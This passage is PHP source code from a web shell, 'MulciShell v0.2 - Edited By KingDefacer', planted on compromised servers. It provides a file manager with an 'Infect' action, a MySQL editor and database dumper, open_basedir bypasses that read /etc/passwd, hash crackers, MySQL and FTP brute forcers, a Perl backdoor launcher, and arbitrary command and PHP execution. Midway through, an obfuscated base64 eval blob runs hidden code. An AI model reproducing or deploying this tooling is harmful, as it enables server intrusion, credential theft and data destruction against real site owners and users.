@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
if(is_array($grp)) $grp=$grp['name'];
if(is_array($own)) $own=$own['name'];
$size="DIR";
@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2);
@$write=is_writable($d.'/'.$f)?"Yes":"No";
$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
if($f==".") {continue;}
elseif($f=="..")
{
$f=Trail($d.'/'.$f);
echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>";
continue;
}
echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
}
foreach($files as $f)
{
@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
if(is_array($grp)) $grp=$grp['name'];
if(is_array($own)) $own=$own['name'];
@$size=TrueSize(filesize($d.'/'.$f));
@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3);
@$write=is_writable($d.'/'.$f)?"Yes":"No";
@$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
}
echo "</table>
<input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br>
With checked file(s):
<select name='fileaction'>
<option name='chmod'>Chmod</option>
<option name='delete'>Delete</option>
<option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'>
</select>
<br><input type='submit' value='Go' name='massfiles'></form>";
function SQLLogin()
{
global $self;
if(!isset($_SESSION['log'])&&!isset($_POST['mconnect']))
{
echo "<center><form action='$self?act=sql' method='post'>
Host: <input type='text' value='localhost' name='mhost'>
Username: <input type='text' value='root' name='muser'>
Password: <input type='password' value='' name='mpass'>
Port: <input type='text' style='width: 40px' value='3306' name='mport'>
<input type='submit' value='Connect' name='mconnect'>
</form>
</center>";
}
elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect']))
{
extract($_POST);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
$_SESSION['muser']=$muser;
$_SESSION['mhost']=$mhost;
$_SESSION['mpass']=$mpass;
$_SESSION['mport']=$mport;
$_SESSION['log']=true;
header("Location: $self?act=sqledit");
}
else
echo "Failed to login with $muser@$mhost!<br>";
} else {
header("Location: $self?act=sqledit");
}
}
function SQLEditor()
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>";
echo "<form method='POST' action='$self?'>
Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>
<input type='hidden' name='db' value='$_GET[db]'>
<input type='submit' value='Go' name='sql'>
</form>";
echo "<form action='$self?act=sqledit' method='post'>
<input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>
</form></center></br></br>";
if(isset($_POST['sql_list_proc']))
{
$res=mysql_list_processes();
echo "<table style='margin: auto; text-align: center;'><tr>
<td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>
</tr>";
while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>";
mysql_free_result($res);
echo "</table></br>";
}
if(!isset($_GET['db']))
{
if(isset($_POST['dbc'])) db_create();
if(isset($_GET['dropdb'])) SQLDrop();
echo "<table style='margin: auto; text-align: center;'>
<tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
$all_your_base=mysql_list_dbs($conn);
while($your_base=mysql_fetch_assoc($all_your_base))
{
$tbl=mysql_query("SHOW TABLES FROM $your_base[Database]");
$tbl_count=mysql_num_rows($tbl);
echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>";
}
echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
}
elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
{
if(isset($_POST['tblc'])) table_create();
if(isset($_GET['droptbl'])) SQLDrop();
echo "<table style='margin: auto; text-align: center;'>
<tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
$tables=mysql_query("SHOW TABLES FROM $_GET[db]");
while($tblc=mysql_fetch_array($tables))
{
$fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]");
$fc=mysql_num_rows($fCount);
echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>";
}
echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
}
elseif(isset($_GET['field'])&&isset($_POST['sqlsave']))
{
$discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
$values=mysql_fetch_assoc($discard_values);
$keys=array_keys($values);
$values=array();
foreach($_POST as $k=>$v)
if(in_array($k,$keys)) $values[]=$v;
$query="UPDATE $_GET[db].$_GET[tbl] SET ";
for($y=0;$y<count($values);$y++)
{
if($y==count($values)-1)
$query.="$keys[$y]='$values[$y]' ";
else
$query.="$keys[$y]='$values[$y]', ";
}
$query.="WHERE $_GET[field] = '$_GET[v]'";
$try=mysql_query($query) or die(mysql_error());
echo "<center>Table updated!<br>";
echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>";
}
elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del']))
{
echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>";
$sql_fields=array();
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field'];
$data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
$d_piece=mysql_fetch_assoc($data);
for($m=0;$m<count($sql_fields);$m++)
{
$point=$sql_fields[$m];
echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>";
}
echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
}
elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
if(isset($_GET['insert'])) SQLInsert();
if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del']))
{
echo "<center>";
if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>";
else echo "Failed to delete row</br>";
echo "</center>";
}
echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[Insert new row]</a></center>";
echo "<table style='margin: auto; text-align: center;'><tr>";
$cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
$fields=array();
while($col=mysql_fetch_assoc($cols))
{
array_push($fields,$col['Field']);
echo "<td>$col[Field]</td>";
}
echo "</tr>";
if(isset($_GET['s'])&&is_numeric($_GET['s']))
{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");}
else
{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");}
while($select=mysql_fetch_row($selector))
{
echo "<tr>";
for($i=0;$i<count($fields);$i++)
{
echo "<td>".htmlspecialchars($select[$i])."</td>";
}
echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>";
echo "</tr>";
}
echo "</table>";
echo "<table style='margin: auto;'>";
if(isset($_GET['s']))
{
$prev=intval($_GET['s'])-250;
$next=intval($_GET['s'])+250;
if($_GET['s']>0)
echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>";
if(mysql_num_rows($selector)>249)
echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>";
}
else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>";
echo "</table>";
}
else
{
$_SESSION=array();
session_destroy();
header("Location: $self?act=sql");
}
}
}
function SQLDownload()
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(isset($_GET['db'])&&!isset($_GET['tbl']))
{
$tables=array();
$dump_file="##################SQL Database dump####################\n";
$dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n\n";
$get_tables=mysql_query("SHOW TABLES FROM $_GET[db]");
while($current_table=mysql_fetch_array($get_tables))
$tables[]=$current_table[0];
foreach($tables as $table_dump)
{
$data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump");
while($current_data=mysql_fetch_assoc($data_selection))
{
$fields=implode("`, `", array_keys($current_data));
$values=implode("`, `",array_values($current_data));
$dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); ";
}
}
} elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
$dump_file="##################SQL Database dump####################\n";
$dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n";
$table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]");
while($table_data=mysql_fetch_assoc($table_dump))
{
$fields=implode("`, `",array_keys($table_data));
$values=implode("`, `",array_values($table_data));
$dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n";
}
} else {
echo "Invalid!";
}
}
$dump_file.="########################################################################################";
if(!isset($_GET['tbl']))
$file_name="$_GET[db]"."_DUMP.sql";
else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql";
ob_get_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($dump_file));
header("Content-disposition: attachment; filename=$file_name;");
echo $dump_file;
exit;
}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
function SqlInsert()
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(!isset($_POST['sql_insert']))
{
echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>";
$sql_fields=array();
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];
for($s=0;$s<count($sql_fields);$s++)
echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></br>";
echo "<input type='submit' value='Insert' name='sql_insert'></center></form>";
} else {
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];
$values=array();
$keys=array();
$query="INSERT INTO $_GET[db].$_GET[tbl] (";
foreach($_POST as $k=>$v)
{
if(in_array($k,$sql_fields)&&!empty($v))
{
$values[]=$v;
$keys[]=$k;
}
}
for($k=0;$k<count($keys);$k++)
{
if($k==count($keys)-1) $query.="`$keys[$k]`";
else
$query.="`$keys[$k]`,";
}
$query.=") VALUES (";
for($v=0;$v<count($values);$v++)
{
if($v==count($values)-1) $query.="'$values[$v]'";
else
$query.="'$values[$v]',";
}
$query.=")";
echo "<center>";
if(@mysql_query($query)) echo "Row inserted</br>";
else echo "Failed to insert row</br>";
echo "</center>";
}
}
}
function SQLDrop()
{
echo "<center>";
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(!isset($_GET['droptbl']))
{
$query="DROP DATABASE $_GET[dropdb]";
if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>";
else echo "Failed to drop database $_GET[dropdb]<br>";
} elseif(isset($_GET['db'])&&isset($_GET['droptbl']))
{
$query="DELETE FROM $_GET[db].$_GET[droptbl]";
if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>";
else echo "Failed to drop table $_GET[droptbl]<br>";
} else {
echo "Invalid request<br>";
}
} else echo "Failed to connect<br>";
echo "</center>";
}
function db_create()
{
echo "<center>";
if(isset($_POST['db_name']) && !empty($_POST['db_name']))
{
extract($_SESSION);
@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!";
else echo "Failed to create database $_POST[db_name]</br>";
} else echo "Failed to connect</br>";
} else echo "Enter a DB name</br>";
echo "</cenetr>";
}
function table_create()
{
echo "<center>";
if(isset($_POST['table_name'])&&!empty($_POST['table_name']))
{
extract($_SESSION);
@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
@mysql_select_db($_POST['db_current']);
if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!";
else echo "Failed to create table $_POST[table_name]";
} else echo "Failed to connect!</br>";
} else echo "Enter a table name</br>";
echo "</center>";
}
function FileEditor()
{
if(isset($_GET['file']))
$file=$_GET['file'];
elseif(isset($_POST['nfile']))
$file=$_POST['nfile'];
elseif(isset($_POST['editfile']))
$file=$_POST['editfile'];
if(@!file_exists($file)) die("Permission denied!");
if(isset($_POST['dfile']))
{
@$fh=fopen($file,'r');
@$buffer=fread($fh,filesize($file));
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($buffer));
header("Content-disposition: attachment; filename=".basename($file).';');
@ob_get_clean();
echo $buffer;
@fclose($fh);
}
elseif(isset($_POST['delfile']))
{
if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>";
else echo "File deleted<br>";
}
elseif(isset($_POST['sfile']))
{
$fh=@fopen($file,'w') or die("Failed to open file for editing!");
@fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents']));
echo "File saved!";
@fclose($fh);
}
else
{
$fh=@fopen($file,'r');
echo "<center>
<form action='$self?act=f' method='post'>
File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'>
<input type='submit' value='Go' name='gfile'></br></br>";
echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>";
echo "<input type='submit' value='Save file' name='sfile'>
<input type='submit' value='Download file' name='dfile'>
<input type='submit' value='Delete file' name='delfile'>
</center></form>";
@fclose($fh);
}
}
function security_bypass()
{
if(isset($_POST['curl_bypass']))
{
$ch=curl_init("file://$_POST[file_bypass]");
curl_setopt($ch,CURLOPT_HEADERS,0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$file_out=curl_exec($ch);
curl_close($ch);
echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
}
elseif(isset($_POST['tmp_bypass']))
{
tempnam("/home/",$_POST['file_passwd']);
}
elseif(isset($_POST['copy_bypass']))
{
if(@copy($_POST['file_bypass'],$_POST['dest']))
{
echo "File successfully copied!</br>";
@$fh=fopen($_POST['dest'],'r');
echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
@fclose($fh);
} else echo "Failed to copy file</br>";
}
elseif(isset($_POST['include_bypass']))
{
if(file_exists($_POST['file_bypass']))
{
echo "<textarea rows='20' cols='150' readonly>";
@include($_POST['file_bypass']);
echo "</textarea>";
}
}
elseif(isset($_POST['sql_bypass']))
{
extract($_SESSION);
$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
mysql_select_db($_POST['sql_db']);
mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);");
mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error());
$res=mysql_query("SELECT * FROM $_POST[tmp_table]");
if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!");
if($res)
{
while($row=mysql_fetch_array($res)) $f.="$row[0]</br>";
echo $f;
}
mysql_query("DROP TABLE $_POST[tmp_table]");
}
}
echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>
<tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>
<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>
<tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>
<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>
<tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>
<tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>
</table>";
}
function brute_force()
{
echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr>
<tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr>
<tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr>
<tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr>
<tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr>
<tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr>
<tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr>
<tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr>
<tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr>
<tr><td colspan='2'>Wordlist</td></tr>
<tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr>
</br></table></form>";
}
function BackDoor()
{
global $backdoor_perl;
global $disable;
if(!isset($_POST['backdoor_host']))
{
echo "<center><form action='$self?act=bh' method='post'>
Port: <input type='text' name='port'>
<input type='submit' name='backdoor_host' value='Backdoor'></center>";
} else {
@$fh=fopen("shbd.pl","w");
@fwrite($fh,base64_decode($backdoor_perl));
@fclose($fh);
execmd("perl shbd.pl $_POST[port]",$disable);
echo "Server backdoor'd</br>";
}
}
function sql_rep_search($dir)
{
global $self;
$ext=array(".db",".sql");
@$dh=opendir($dir);
while((@$file=readdir($dh)))
{
$ex=strrchr($file,'.');
if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db")
echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>";
if(is_dir($dir.$file)&&$file!='..'&&$file!='.')
{
if(!preg_match("/\/public_html\//",$dir))
sql_rep_search($dir.$file.'/public_html/');
else
sql_rep_search($dir.$file);
}
}
@closedir($dh);
}
function database_tools()
{
if(isset($_POST['sql_start_search']))
{
echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>";
sql_rep_search("/home/");
echo "</table></center>";
}
$colarr=array();
if(isset($_POST['db_parse']))
{
if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse...");
$db_meth=empty($_POST['db_dpath'])?'uploaded':'path';
$q_delimit=$_POST['q_delimit'];
if(isset($_POST['column_defined']))
{
switch($_POST['column_type'])
{
case 'SMF':
break;
case 'phpbb':
break;
case 'vbulletin':
$colarr=array(4,5,7,48);
break;
}
} else {
$strr=str_replace(", ",",",trim($_POST['db_columns']));
$colarr=explode(",",$strr);
}
switch($db_meth)
{
case 'uploaded':
@$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading");
break;
case 'path':
@$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading");
break;
}
echo "Parsing database contents...</br>";
while(!feof($fh))
{
$c_line=fgets($fh);
$strr=str_replace(", ",",",$c_line);
$arr=explode(',',$strr);
for($i=0;$i<count($colarr);$i++)
{
$index=$colarr[$i];
if(empty($arr[$index])) continue;
$spos=strpos("$_POST[q_delimit]",$arr[$index]);
$spos=strpos("$_POST[q_delimit]",$arr[$index],$spos);
if($i!==count($colarr)-1)
echo "$arr[$index] : ";
else echo "$arr[$index]</br>";
}
continue;
}
@fclose($fh);
}
echo "<table style='width: 100%; margin: auto; text-align: center'>
<tr><td colspan='2'>Database parser</td></tr>
<tr><td>
<form action='$self?act=dbs' method='post' enctype='multipart/form-data'>
Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br>
Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'>
<option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option>
</select></br>
Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'>
</br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'>
</br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr>
<tr><td colspan='2'>Find database Backups</td></tr>
<tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr>
</table>";
}
function show_tools()
{
echo "<form action='$self' method='post'>
<table style='width: 100%; margin: auto; text-align: center'>
<tr><td colspan='2'>Tools</td></tr>
<tr><td>Forum locator</td><td>Config locator</td></tr>
<tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr>
<tr><td>Port scanner</td><td>Search</td></tr>
<tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr>
</table>";
}
function TrueSize($s)
{
if(!$s) return 0;
if($s>=1073741824) return(round($s/1073741824)." GB");
elseif($s>=1048576) return(round($s/1048576)." MB");
elseif($s>=1024) return(round($s/1024)." KB");
else return($s." B");
}
function CleanDir($d)
{
$d=str_replace("\\","/",$d);
$d=str_replace("//","/",$d);
return $d;
}
function Trail($d)
{
$d=explode('/',$d);
array_pop($d);
array_pop($d);
$str=implode($d,'/');
return $str;
}
function Encoder()
{
echo "<form action='$self?' method='post'>
<center>
Input: <input type='text' style='width: 300px' name='encrypt'>
<br><input type='submit' value='Encrypt' name='encryption'>
</center>
</form>";
}
$relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd()));
if(isset($_GET['d'])) $self.="?d=$_GET[d]";
echo "<table style='text-align: center; width: 100%'>
<tr><td colspan='2'>Execute command</td></tr>
<tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr>
<tr><td colspan='2'>Execute PHP</td></tr>
<tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr>
<tr><td>Create directory</td><td>Create file</td></tr>
<tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr>
<tr><td>Enter directory</td><td>Edit file</td></tr>
<tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr>
<tr><td>Upload file</td><td>Wget file</td></tr>
<tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr>
